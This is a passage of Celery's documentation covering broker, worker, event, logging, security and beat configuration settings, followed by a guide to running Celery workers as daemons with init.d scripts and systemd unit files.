alone, so AMQP defines something called heartbeats that's is used both by the client and the broker to detect if a connection was closed. If the heartbeat value is 10 seconds, then the heartbeat will be monitored at the interval specified by the :setting:`broker_heartbeat_checkrate` setting (by default this is set to double the rate of the heartbeat value, so for the 10 seconds, the heartbeat is checked every 5 seconds). .. setting:: broker_heartbeat_checkrate ``broker_heartbeat_checkrate`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :transports supported: ``pyamqp`` Default: 2.0. At intervals the worker will monitor that the broker hasn't missed too many heartbeats. The rate at which this is checked is calculated by dividing the :setting:`broker_heartbeat` value with this value, so if the heartbeat is 10.0 and the rate is the default 2.0, the check will be performed every 5 seconds (twice the heartbeat sending rate). .. setting:: broker_use_ssl ``broker_use_ssl`` ~~~~~~~~~~~~~~~~~~ :transports supported: ``pyamqp``, ``redis`` Default: Disabled. Toggles SSL usage on broker connection and SSL settings. 
The valid values for this option vary by transport. ``pyamqp`` __________ If ``True`` the connection will use SSL with default SSL settings. If set to a dict, will configure SSL connection according to the specified policy. The format used is Python's :func:`ssl.wrap_socket` options. Note that SSL socket is generally served on a separate port by the broker. Example providing a client cert and validating the server cert against a custom certificate authority: .. code-block:: python import ssl broker_use_ssl = { 'keyfile': '/var/ssl/private/worker-key.pem', 'certfile': '/var/ssl/amqp-server-cert.pem', 'ca_certs': '/var/ssl/myca.pem', 'cert_reqs': ssl.CERT_REQUIRED } .. warning:: Be careful using ``broker_use_ssl=True``. It's possible that your default configuration won't validate the server cert at all. Please read Python `ssl module security considerations `_. ``redis`` _________ The setting must be a dict with the following keys: * ``ssl_cert_reqs`` (required): one of the ``SSLContext.verify_mode`` values: * ``ssl.CERT_NONE`` * ``ssl.CERT_OPTIONAL`` * ``ssl.CERT_REQUIRED`` * ``ssl_ca_certs`` (optional): path to the CA certificate * ``ssl_certfile`` (optional): path to the client certificate * ``ssl_keyfile`` (optional): path to the client key .. setting:: broker_pool_limit ``broker_pool_limit`` ~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.3 Default: 10. The maximum number of connections that can be open in the connection pool. The pool is enabled by default since version 2.5, with a default limit of ten connections. This number can be tweaked depending on the number of threads/green-threads (eventlet/gevent) using a connection. For example running eventlet with 1000 greenlets that use a connection to the broker, contention can arise and you should consider increasing the limit. If set to :const:`None` or 0 the connection pool will be disabled and connections will be established and closed for every use. .. setting:: broker_connection_timeout ``broker_connection_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 4.0. The default timeout in seconds before we give up establishing a connection to the AMQP server. This setting is disabled when using gevent. .. note:: The broker connection timeout only applies to a worker attempting to connect to the broker. It does not apply to producer sending a task, see :setting:`broker_transport_options` for how to provide a timeout for that situation. .. setting:: broker_connection_retry ``broker_connection_retry`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Enabled. Automatically try to re-establish the connection to the AMQP broker if lost. The time between retries is increased for each retry, and is not exhausted before :setting:`broker_connection_max_retries` is exceeded. .. setting:: broker_connection_max_retries ``broker_connection_max_retries`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 100. Maximum number of retries before we give up re-establishing a connection to the AMQP broker. If this is set to :const:`0` or :const:`None`, we'll retry forever. .. setting:: broker_login_method ``broker_login_method`` ~~~~~~~~~~~~~~~~~~~~~~~ Default: ``"AMQPLAIN"``. Set custom amqp login method. .. setting:: broker_transport_options ``broker_transport_options`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.2 Default: ``{}`` (empty mapping). A dict of additional options passed to the underlying transport. See your transport user manual for supported options (if any). Example setting the visibility timeout (supported by Redis and SQS transports): .. 
code-block:: python broker_transport_options = {'visibility_timeout': 18000} # 5 hours Example setting the producer connection maximum number of retries (so producers won't retry forever if the broker isn't available at the first task execution): .. code-block:: python broker_transport_options = {'max_retries': 5} .. _conf-worker: Worker ------ .. setting:: imports ``imports`` ~~~~~~~~~~~ Default: ``[]`` (empty list). A sequence of modules to import when the worker starts. This is used to specify the task modules to import, but also to import signal handlers and additional remote control commands, etc. The modules will be imported in the original order. .. setting:: include ``include`` ~~~~~~~~~~~ Default: ``[]`` (empty list). Exact same semantics as :setting:`imports`, but can be used as a means to have different import categories. The modules in this setting are imported after the modules in :setting:`imports`. .. setting:: worker_deduplicate_successful_tasks ``worker_deduplicate_successful_tasks`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 5.1 Default: False Before each task execution, instruct the worker to check if this task is a duplicate message. Deduplication occurs only with tasks that have the same identifier, enabled late acknowledgment, were redelivered by the message broker and their state is ``SUCCESS`` in the result backend. To avoid overflowing the result backend with queries, a local cache of successfully executed tasks is checked before querying the result backend in case the task was already successfully executed by the same worker that received the task. This cache can be made persistent by setting the :setting:`worker_state_db` setting. If the result backend is not persistent (the RPC backend, for example), this setting is ignored. .. _conf-concurrency: .. setting:: worker_concurrency ``worker_concurrency`` ~~~~~~~~~~~~~~~~~~~~~~ Default: Number of CPU cores. The number of concurrent worker processes/threads/green threads executing tasks. If you're doing mostly I/O you can have more processes, but if mostly CPU-bound, try to keep it close to the number of CPUs on your machine. If not set, the number of CPUs/cores on the host will be used. .. setting:: worker_prefetch_multiplier ``worker_prefetch_multiplier`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 4. How many messages to prefetch at a time multiplied by the number of concurrent processes. The default is 4 (four messages for each process). The default setting is usually a good choice, however -- if you have very long running tasks waiting in the queue and you have to start the workers, note that the first worker to start will receive four times the number of messages initially. Thus the tasks may not be fairly distributed to the workers. To disable prefetching, set :setting:`worker_prefetch_multiplier` to 1. Changing that setting to 0 will allow the worker to keep consuming as many messages as it wants. For more on prefetching, read :ref:`optimizing-prefetch-limit` .. note:: Tasks with ETA/countdown aren't affected by prefetch limits. .. setting:: worker_lost_wait ``worker_lost_wait`` ~~~~~~~~~~~~~~~~~~~~ Default: 10.0 seconds. In some cases a worker may be killed without proper cleanup, and the worker may have published a result before terminating. This value specifies how long we wait for any missing results before raising a :exc:`@WorkerLostError` exception. .. 
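Putting the worker settings above together, a minimal sketch (the numbers are arbitrary and only illustrate how prefetching scales with concurrency):

.. code-block:: python

    worker_concurrency = 8           # eight pool processes
    worker_prefetch_multiplier = 4   # the worker reserves up to 8 * 4 = 32 messages
    worker_lost_wait = 10.0          # seconds to wait for a lost worker's result

..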
setting:: worker_max_tasks_per_child ``worker_max_tasks_per_child`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Maximum number of tasks a pool worker process can execute before it's replaced with a new one. Default is no limit. .. setting:: worker_max_memory_per_child ``worker_max_memory_per_child`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: No limit. Type: int (kilobytes) Maximum amount of resident memory, in kilobytes, that may be consumed by a worker before it will be replaced by a new worker. If a single task causes a worker to exceed this limit, the task will be completed, and the worker will be replaced afterwards. Example: .. code-block:: python worker_max_memory_per_child = 12000 # 12MB .. setting:: worker_disable_rate_limits ``worker_disable_rate_limits`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled (rate limits enabled). Disable all rate limits, even if tasks has explicit rate limits set. .. setting:: worker_state_db ``worker_state_db`` ~~~~~~~~~~~~~~~~~~~ Default: :const:`None`. Name of the file used to stores persistent worker state (like revoked tasks). Can be a relative or absolute path, but be aware that the suffix `.db` may be appended to the file name (depending on Python version). Can also be set via the :option:`celery worker --statedb` argument. .. setting:: worker_timer_precision ``worker_timer_precision`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 1.0 seconds. Set the maximum time in seconds that the ETA scheduler can sleep between rechecking the schedule. Setting this value to 1 second means the schedulers precision will be 1 second. If you need near millisecond precision you can set this to 0.1. .. setting:: worker_enable_remote_control ``worker_enable_remote_control`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Enabled by default. Specify if remote control of the workers is enabled. .. setting:: worker_proc_alive_timeout ``worker_proc_alive_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 4.0. The timeout in seconds (int/float) when waiting for a new worker process to start up. .. setting:: worker_cancel_long_running_tasks_on_connection_loss ``worker_cancel_long_running_tasks_on_connection_loss`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 5.1 Default: Disabled by default. Kill all long-running tasks with late acknowledgment enabled on connection loss. Tasks which have not been acknowledged before the connection loss cannot do so anymore since their channel is gone and the task is redelivered back to the queue. This is why tasks with late acknowledged enabled must be idempotent as they may be executed more than once. In this case, the task is being executed twice per connection loss (and sometimes in parallel in other workers). When turning this option on, those tasks which have not been completed are cancelled and their execution is terminated. Tasks which have completed in any way before the connection loss are recorded as such in the result backend as long as :setting:`task_ignore_result` is not enabled. .. warning:: This feature was introduced as a future breaking change. If it is turned off, Celery will emit a warning message. In Celery 6.0, the :setting:`worker_cancel_long_running_tasks_on_connection_loss` will be set to ``True`` by default as the current behavior leads to more problems than it solves. .. _conf-events: Events ------ .. setting:: worker_send_task_events ``worker_send_task_events`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled by default. Send task-related events so that tasks can be monitored using tools like `flower`. 
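A minimal sketch enabling events from configuration rather than the ``-E`` command-line option (``task_send_sent_event``, covered below, is often enabled alongside it):

.. code-block:: python

    worker_send_task_events = True
    # Optionally also emit an event when a task message is published:
    task_send_sent_event = True
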
Sets the default value for the workers :option:`-E ` argument. .. setting:: task_send_sent_event ``task_send_sent_event`` ~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.2 Default: Disabled by default. If enabled, a :event:`task-sent` event will be sent for every task so tasks can be tracked before they're consumed by a worker. .. setting:: event_queue_ttl ``event_queue_ttl`` ~~~~~~~~~~~~~~~~~~~ :transports supported: ``amqp`` Default: 5.0 seconds. Message expiry time in seconds (int/float) for when messages sent to a monitor clients event queue is deleted (``x-message-ttl``) For example, if this value is set to 10 then a message delivered to this queue will be deleted after 10 seconds. .. setting:: event_queue_expires ``event_queue_expires`` ~~~~~~~~~~~~~~~~~~~~~~~ :transports supported: ``amqp`` Default: 60.0 seconds. Expiry time in seconds (int/float) for when after a monitor clients event queue will be deleted (``x-expires``). .. setting:: event_queue_prefix ``event_queue_prefix`` ~~~~~~~~~~~~~~~~~~~~~~ Default: ``"celeryev"``. The prefix to use for event receiver queue names. .. setting:: event_exchange ``event_exchange`` ~~~~~~~~~~~~~~~~~~~~~~ Default: ``"celeryev"``. Name of the event exchange. .. warning:: This option is in experimental stage, please use it with caution. .. setting:: event_serializer ``event_serializer`` ~~~~~~~~~~~~~~~~~~~~ Default: ``"json"``. Message serialization format used when sending event messages. .. seealso:: :ref:`calling-serializers`. .. _conf-control: Remote Control Commands ----------------------- .. note:: To disable remote control commands see the :setting:`worker_enable_remote_control` setting. .. setting:: control_queue_ttl ``control_queue_ttl`` ~~~~~~~~~~~~~~~~~~~~~ Default: 300.0 Time in seconds, before a message in a remote control command queue will expire. If using the default of 300 seconds, this means that if a remote control command is sent and no worker picks it up within 300 seconds, the command is discarded. This setting also applies to remote control reply queues. .. setting:: control_queue_expires ``control_queue_expires`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 10.0 Time in seconds, before an unused remote control command queue is deleted from the broker. This setting also applies to remote control reply queues. .. setting:: control_exchange ``control_exchange`` ~~~~~~~~~~~~~~~~~~~~~~ Default: ``"celery"``. Name of the control command exchange. .. warning:: This option is in experimental stage, please use it with caution. .. _conf-logging: Logging ------- .. setting:: worker_hijack_root_logger ``worker_hijack_root_logger`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.2 Default: Enabled by default (hijack root logger). By default any previously configured handlers on the root logger will be removed. If you want to customize your own logging handlers, then you can disable this behavior by setting `worker_hijack_root_logger = False`. .. note:: Logging can also be customized by connecting to the :signal:`celery.signals.setup_logging` signal. .. setting:: worker_log_color ``worker_log_color`` ~~~~~~~~~~~~~~~~~~~~ Default: Enabled if app is logging to a terminal. Enables/disables colors in logging output by the Celery apps. .. setting:: worker_log_format ``worker_log_format`` ~~~~~~~~~~~~~~~~~~~~~ Default: .. code-block:: text "[%(asctime)s: %(levelname)s/%(processName)s] %(message)s" The format to use for log messages. See the Python :mod:`logging` module for more information about log formats. .. 
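For instance, a minimal sketch overriding the default format to also include the logger name (any standard :mod:`logging` placeholder can be used):

.. code-block:: python

    worker_log_format = (
        '[%(asctime)s: %(levelname)s/%(processName)s] '
        '%(name)s: %(message)s'
    )

..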
setting:: worker_task_log_format ``worker_task_log_format`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: .. code-block:: text "[%(asctime)s: %(levelname)s/%(processName)s] %(task_name)s[%(task_id)s]: %(message)s" The format to use for log messages logged in tasks. See the Python :mod:`logging` module for more information about log formats. .. setting:: worker_redirect_stdouts ``worker_redirect_stdouts`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Enabled by default. If enabled `stdout` and `stderr` will be redirected to the current logger. Used by :program:`celery worker` and :program:`celery beat`. .. setting:: worker_redirect_stdouts_level ``worker_redirect_stdouts_level`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`WARNING`. The log level output to `stdout` and `stderr` is logged as. Can be one of :const:`DEBUG`, :const:`INFO`, :const:`WARNING`, :const:`ERROR`, or :const:`CRITICAL`. .. _conf-security: Security -------- .. setting:: security_key ``security_key`` ~~~~~~~~~~~~~~~~ Default: :const:`None`. .. versionadded:: 2.5 The relative or absolute path to a file containing the private key used to sign messages when :ref:`message-signing` is used. .. setting:: security_certificate ``security_certificate`` ~~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`None`. .. versionadded:: 2.5 The relative or absolute path to an X.509 certificate file used to sign messages when :ref:`message-signing` is used. .. setting:: security_cert_store ``security_cert_store`` ~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`None`. .. versionadded:: 2.5 The directory containing X.509 certificates used for :ref:`message-signing`. Can be a glob with wild-cards, (for example :file:`/etc/certs/*.pem`). .. setting:: security_digest ``security_digest`` ~~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`sha256`. .. versionadded:: 4.3 A cryptography digest used to sign messages when :ref:`message-signing` is used. https://cryptography.io/en/latest/hazmat/primitives/cryptographic-hashes/#module-cryptography.hazmat.primitives.hashes .. _conf-custom-components: Custom Component Classes (advanced) ----------------------------------- .. setting:: worker_pool ``worker_pool`` ~~~~~~~~~~~~~~~ Default: ``"prefork"`` (``celery.concurrency.prefork:TaskPool``). Name of the pool class used by the worker. .. admonition:: Eventlet/Gevent Never use this option to select the eventlet or gevent pool. You must use the :option:`-P ` option to :program:`celery worker` instead, to ensure the monkey patches aren't applied too late, causing things to break in strange ways. .. setting:: worker_pool_restarts ``worker_pool_restarts`` ~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled by default. If enabled the worker pool can be restarted using the :control:`pool_restart` remote control command. .. setting:: worker_autoscaler ``worker_autoscaler`` ~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.2 Default: ``"celery.worker.autoscale:Autoscaler"``. Name of the autoscaler class to use. .. setting:: worker_consumer ``worker_consumer`` ~~~~~~~~~~~~~~~~~~~ Default: ``"celery.worker.consumer:Consumer"``. Name of the consumer class used by the worker. .. setting:: worker_timer ``worker_timer`` ~~~~~~~~~~~~~~~~ Default: ``"kombu.asynchronous.hub.timer:Timer"``. Name of the ETA scheduler class used by the worker. Default is or set by the pool implementation. .. _conf-celerybeat: Beat Settings (:program:`celery beat`) -------------------------------------- .. setting:: beat_schedule ``beat_schedule`` ~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). 
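As a quick illustration of the mapping format, a minimal sketch with a single entry (the task name ``tasks.add`` and the 30-second interval are hypothetical):

.. code-block:: python

    beat_schedule = {
        'add-every-30-seconds': {
            'task': 'tasks.add',
            'schedule': 30.0,      # run every 30 seconds
            'args': (16, 16),
        },
    }
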
The periodic task schedule used by :mod:`~celery.bin.beat`. See :ref:`beat-entries`. .. setting:: beat_scheduler ``beat_scheduler`` ~~~~~~~~~~~~~~~~~~ Default: ``"celery.beat:PersistentScheduler"``. The default scheduler class. May be set to ``"django_celery_beat.schedulers:DatabaseScheduler"`` for instance, if used alongside :pypi:`django-celery-beat` extension. Can also be set via the :option:`celery beat -S` argument. .. setting:: beat_schedule_filename ``beat_schedule_filename`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``"celerybeat-schedule"``. Name of the file used by `PersistentScheduler` to store the last run times of periodic tasks. Can be a relative or absolute path, but be aware that the suffix `.db` may be appended to the file name (depending on Python version). Can also be set via the :option:`celery beat --schedule` argument. .. setting:: beat_sync_every ``beat_sync_every`` ~~~~~~~~~~~~~~~~~~~ Default: 0. The number of periodic tasks that can be called before another database sync is issued. A value of 0 (default) means sync based on timing - default of 3 minutes as determined by scheduler.sync_every. If set to 1, beat will call sync after every task message sent. .. setting:: beat_max_loop_interval ``beat_max_loop_interval`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 0. The maximum number of seconds :mod:`~celery.bin.beat` can sleep between checking the schedule. The default for this value is scheduler specific. For the default Celery beat scheduler the value is 300 (5 minutes), but for the :pypi:`django-celery-beat` database scheduler it's 5 seconds because the schedule may be changed externally, and so it must take changes to the schedule into account. Also when running Celery beat embedded (:option:`-B `) on Jython as a thread the max interval is overridden and set to 1 so that it's possible to shut down in a timely manner. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/userguide/daemonizing.rst0000664000175000017500000004226100000000000020664 0ustar00asifasif00000000000000.. _daemonizing: ====================================================================== Daemonization ====================================================================== .. contents:: :local: Most Linux distributions these days use systemd for managing the lifecycle of system and user services. You can check if your Linux distribution uses systemd by typing: .. code-block:: console $ systemd --version systemd 237 +PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN2 +IDN -PCRE2 default-hierarchy=hybrid If you have output similar to the above, please refer to :ref:`our systemd documentation ` for guidance. However, the init.d script should still work in those Linux distributions as well since systemd provides the systemd-sysv compatibility layer which generates services automatically from the init.d scripts we provide. If you package Celery for multiple Linux distributions and some do not support systemd or to other Unix systems as well, you may want to refer to :ref:`our init.d documentation `. .. _daemon-generic: Generic init-scripts ====================================================================== See the `extra/generic-init.d/`_ directory Celery distribution. This directory contains generic bash init-scripts for the :program:`celery worker` program, these should run on Linux, FreeBSD, OpenBSD, and other Unix-like platforms. .. 
_`extra/generic-init.d/`: https://github.com/celery/celery/tree/master/extra/generic-init.d/ .. _generic-initd-celeryd: Init-script: ``celeryd`` ---------------------------------------------------------------------- :Usage: `/etc/init.d/celeryd {start|stop|restart|status}` :Configuration file: :file:`/etc/default/celeryd` To configure this script to run the worker properly you probably need to at least tell it where to change directory to when it starts (to find the module containing your app, or your configuration module). The daemonization script is configured by the file :file:`/etc/default/celeryd`. This is a shell (:command:`sh`) script where you can add environment variables like the configuration options below. To add real environment variables affecting the worker you must also export them (e.g., :command:`export DISPLAY=":0"`) .. Admonition:: Superuser privileges required The init-scripts can only be used by root, and the shell configuration file must also be owned by root. Unprivileged users don't need to use the init-script, instead they can use the :program:`celery multi` utility (or :program:`celery worker --detach`): .. code-block:: console $ celery -A proj multi start worker1 \ --pidfile="$HOME/run/celery/%n.pid" \ --logfile="$HOME/log/celery/%n%I.log" $ celery -A proj multi restart worker1 \ --logfile="$HOME/log/celery/%n%I.log" \ --pidfile="$HOME/run/celery/%n.pid $ celery multi stopwait worker1 --pidfile="$HOME/run/celery/%n.pid" .. _generic-initd-celeryd-example: Example configuration ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is an example configuration for a Python project. :file:`/etc/default/celeryd`: .. code-block:: bash # Names of nodes to start # most people will only start one node: CELERYD_NODES="worker1" # but you can also start multiple and configure settings # for each in CELERYD_OPTS #CELERYD_NODES="worker1 worker2 worker3" # alternatively, you can specify the number of nodes to start: #CELERYD_NODES=10 # Absolute or relative path to the 'celery' command: CELERY_BIN="/usr/local/bin/celery" #CELERY_BIN="/virtualenvs/def/bin/celery" # App instance to use # comment out this line if you don't use an app CELERY_APP="proj" # or fully qualified: #CELERY_APP="proj.tasks:app" # Where to chdir at start. CELERYD_CHDIR="/opt/Myproject/" # Extra command-line arguments to the worker CELERYD_OPTS="--time-limit=300 --concurrency=8" # Configure node-specific settings by appending node name to arguments: #CELERYD_OPTS="--time-limit=300 -c 8 -c:worker2 4 -c:worker3 2 -Ofair:worker1" # Set logging level to DEBUG #CELERYD_LOG_LEVEL="DEBUG" # %n will be replaced with the first part of the nodename. CELERYD_LOG_FILE="/var/log/celery/%n%I.log" CELERYD_PID_FILE="/var/run/celery/%n.pid" # Workers should run as an unprivileged user. # You need to create this user manually (or you can choose # a user/group combination that already exists (e.g., nobody). CELERYD_USER="celery" CELERYD_GROUP="celery" # If enabled pid and log directories will be created if missing, # and owned by the userid/group configured. CELERY_CREATE_DIRS=1 Using a login shell ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You can inherit the environment of the ``CELERYD_USER`` by using a login shell: .. code-block:: bash CELERYD_SU_ARGS="-l" Note that this isn't recommended, and that you should only use this option when absolutely necessary. .. 
_generic-initd-celeryd-django-example: Example Django configuration ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Django users now uses the exact same template as above, but make sure that the module that defines your Celery app instance also sets a default value for :envvar:`DJANGO_SETTINGS_MODULE` as shown in the example Django project in :ref:`django-first-steps`. .. _generic-initd-celeryd-options: Available options ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * ``CELERY_APP`` App instance to use (value for :option:`--app ` argument). * ``CELERY_BIN`` Absolute or relative path to the :program:`celery` program. Examples: * :file:`celery` * :file:`/usr/local/bin/celery` * :file:`/virtualenvs/proj/bin/celery` * :file:`/virtualenvs/proj/bin/python -m celery` * ``CELERYD_NODES`` List of node names to start (separated by space). * ``CELERYD_OPTS`` Additional command-line arguments for the worker, see `celery worker --help` for a list. This also supports the extended syntax used by `multi` to configure settings for individual nodes. See `celery multi --help` for some multi-node configuration examples. * ``CELERYD_CHDIR`` Path to change directory to at start. Default is to stay in the current directory. * ``CELERYD_PID_FILE`` Full path to the PID file. Default is /var/run/celery/%n.pid * ``CELERYD_LOG_FILE`` Full path to the worker log file. Default is /var/log/celery/%n%I.log **Note**: Using `%I` is important when using the prefork pool as having multiple processes share the same log file will lead to race conditions. * ``CELERYD_LOG_LEVEL`` Worker log level. Default is INFO. * ``CELERYD_USER`` User to run the worker as. Default is current user. * ``CELERYD_GROUP`` Group to run worker as. Default is current user. * ``CELERY_CREATE_DIRS`` Always create directories (log directory and pid file directory). Default is to only create directories when no custom logfile/pidfile set. * ``CELERY_CREATE_RUNDIR`` Always create pidfile directory. By default only enabled when no custom pidfile location set. * ``CELERY_CREATE_LOGDIR`` Always create logfile directory. By default only enable when no custom logfile location set. .. _generic-initd-celerybeat: Init-script: ``celerybeat`` ---------------------------------------------------------------------- :Usage: `/etc/init.d/celerybeat {start|stop|restart}` :Configuration file: :file:`/etc/default/celerybeat` or :file:`/etc/default/celeryd`. .. _generic-initd-celerybeat-example: Example configuration ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is an example configuration for a Python project: `/etc/default/celerybeat`: .. code-block:: bash # Absolute or relative path to the 'celery' command: CELERY_BIN="/usr/local/bin/celery" #CELERY_BIN="/virtualenvs/def/bin/celery" # App instance to use # comment out this line if you don't use an app CELERY_APP="proj" # or fully qualified: #CELERY_APP="proj.tasks:app" # Where to chdir at start. CELERYBEAT_CHDIR="/opt/Myproject/" # Extra arguments to celerybeat CELERYBEAT_OPTS="--schedule=/var/run/celery/celerybeat-schedule" .. _generic-initd-celerybeat-django-example: Example Django configuration ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ You should use the same template as above, but make sure the ``DJANGO_SETTINGS_MODULE`` variable is set (and exported), and that ``CELERYD_CHDIR`` is set to the projects directory: .. code-block:: bash export DJANGO_SETTINGS_MODULE="settings" CELERYD_CHDIR="/opt/MyProject" .. 
_generic-initd-celerybeat-options: Available options ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * ``CELERY_APP`` App instance to use (value for :option:`--app ` argument). * ``CELERYBEAT_OPTS`` Additional arguments to :program:`celery beat`, see :command:`celery beat --help` for a list of available options. * ``CELERYBEAT_PID_FILE`` Full path to the PID file. Default is :file:`/var/run/celeryd.pid`. * ``CELERYBEAT_LOG_FILE`` Full path to the log file. Default is :file:`/var/log/celeryd.log`. * ``CELERYBEAT_LOG_LEVEL`` Log level to use. Default is ``INFO``. * ``CELERYBEAT_USER`` User to run beat as. Default is the current user. * ``CELERYBEAT_GROUP`` Group to run beat as. Default is the current user. * ``CELERY_CREATE_DIRS`` Always create directories (log directory and pid file directory). Default is to only create directories when no custom logfile/pidfile set. * ``CELERY_CREATE_RUNDIR`` Always create pidfile directory. By default only enabled when no custom pidfile location set. * ``CELERY_CREATE_LOGDIR`` Always create logfile directory. By default only enable when no custom logfile location set. .. _generic-initd-troubleshooting: Troubleshooting ---------------------------------------------------------------------- If you can't get the init-scripts to work, you should try running them in *verbose mode*: .. code-block:: console # sh -x /etc/init.d/celeryd start This can reveal hints as to why the service won't start. If the worker starts with *"OK"* but exits almost immediately afterwards and there's no evidence in the log file, then there's probably an error but as the daemons standard outputs are already closed you'll not be able to see them anywhere. For this situation you can use the :envvar:`C_FAKEFORK` environment variable to skip the daemonization step: .. code-block:: console # C_FAKEFORK=1 sh -x /etc/init.d/celeryd start and now you should be able to see the errors. Commonly such errors are caused by insufficient permissions to read from, or write to a file, and also by syntax errors in configuration modules, user modules, third-party libraries, or even from Celery itself (if you've found a bug you should :ref:`report it `). .. _daemon-systemd-generic: Usage ``systemd`` ====================================================================== * `extra/systemd/`_ .. _`extra/systemd/`: https://github.com/celery/celery/tree/master/extra/systemd/ .. _generic-systemd-celery: :Usage: `systemctl {start|stop|restart|status} celery.service` :Configuration file: /etc/conf.d/celery Service file: celery.service ---------------------------------------------------------------------- This is an example systemd file: :file:`/etc/systemd/system/celery.service`: .. 
code-block:: bash [Unit] Description=Celery Service After=network.target [Service] Type=forking User=celery Group=celery EnvironmentFile=/etc/conf.d/celery WorkingDirectory=/opt/celery ExecStart=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi start $CELERYD_NODES \ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \ --loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS' ExecStop=/bin/sh -c '${CELERY_BIN} multi stopwait $CELERYD_NODES \ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \ --loglevel="${CELERYD_LOG_LEVEL}"' ExecReload=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi restart $CELERYD_NODES \ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \ --loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS' Restart=always [Install] WantedBy=multi-user.target Once you've put that file in :file:`/etc/systemd/system`, you should run :command:`systemctl daemon-reload` in order that Systemd acknowledges that file. You should also run that command each time you modify it. Use :command:`systemctl enable celery.service` if you want the celery service to automatically start when (re)booting the system. Optionally you can specify extra dependencies for the celery service: e.g. if you use RabbitMQ as a broker, you could specify ``rabbitmq-server.service`` in both ``After=`` and ``Requires=`` in the ``[Unit]`` `systemd section `_. To configure user, group, :command:`chdir` change settings: ``User``, ``Group``, and ``WorkingDirectory`` defined in :file:`/etc/systemd/system/celery.service`. You can also use systemd-tmpfiles in order to create working directories (for logs and pid). :file: `/etc/tmpfiles.d/celery.conf` .. code-block:: bash d /run/celery 0755 celery celery - d /var/log/celery 0755 celery celery - .. _generic-systemd-celery-example: Example configuration ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is an example configuration for a Python project: :file:`/etc/conf.d/celery`: .. code-block:: bash # Name of nodes to start # here we have a single node CELERYD_NODES="w1" # or we could have three nodes: #CELERYD_NODES="w1 w2 w3" # Absolute or relative path to the 'celery' command: CELERY_BIN="/usr/local/bin/celery" #CELERY_BIN="/virtualenvs/def/bin/celery" # App instance to use # comment out this line if you don't use an app CELERY_APP="proj" # or fully qualified: #CELERY_APP="proj.tasks:app" # How to call manage.py CELERYD_MULTI="multi" # Extra command-line arguments to the worker CELERYD_OPTS="--time-limit=300 --concurrency=8" # - %n will be replaced with the first part of the nodename. # - %I will be replaced with the current child process index # and is important when using the prefork pool to avoid race conditions. CELERYD_PID_FILE="/var/run/celery/%n.pid" CELERYD_LOG_FILE="/var/log/celery/%n%I.log" CELERYD_LOG_LEVEL="INFO" # you may wish to add these options for Celery Beat CELERYBEAT_PID_FILE="/var/run/celery/beat.pid" CELERYBEAT_LOG_FILE="/var/log/celery/beat.log" Service file: celerybeat.service ---------------------------------------------------------------------- This is 